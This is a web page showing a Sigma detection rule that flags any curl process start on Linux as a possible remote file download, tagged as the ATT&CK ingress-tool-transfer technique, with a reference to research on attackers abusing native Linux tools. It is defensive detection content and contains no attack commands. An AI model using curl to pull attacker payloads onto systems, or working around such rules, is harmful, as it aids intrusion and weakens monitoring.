Curl Usage on Linux

calendar Oct 17, 2023 · attack.command_and_control attack.t1105  ·
Share on: linkedin copy

Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server

Sigma rule (View on GitHub)

 1title: Curl Usage on Linux
 2id: ea34fb97-e2c4-4afb-810f-785e4459b194
 3status: test
 4description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
 5references:
 6    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
 7author: Nasreddine Bencherchali (Nextron Systems)
 8date: 2022/09/15
 9tags:
10    - attack.command_and_control
11    - attack.t1105
12logsource:
13    category: process_creation
14    product: linux
15detection:
16    selection:
17        Image|endswith: '/curl'
18    condition: selection
19falsepositives:
20    - Scripts created by developers and admins
21    - Administrative activity
22level: low

References

  • How Malicious Actors Abuse Native Linux Tools in Their Attacks

    Through our honeypots and telemetry, we were able to observe instances in which malicious actors abused native Linux tools to launch attacks on Linux environments. In this blog entry, we discuss how these utilities were used and provide recommendations on how to minimize their impact.


    Read More

Related rules

to-top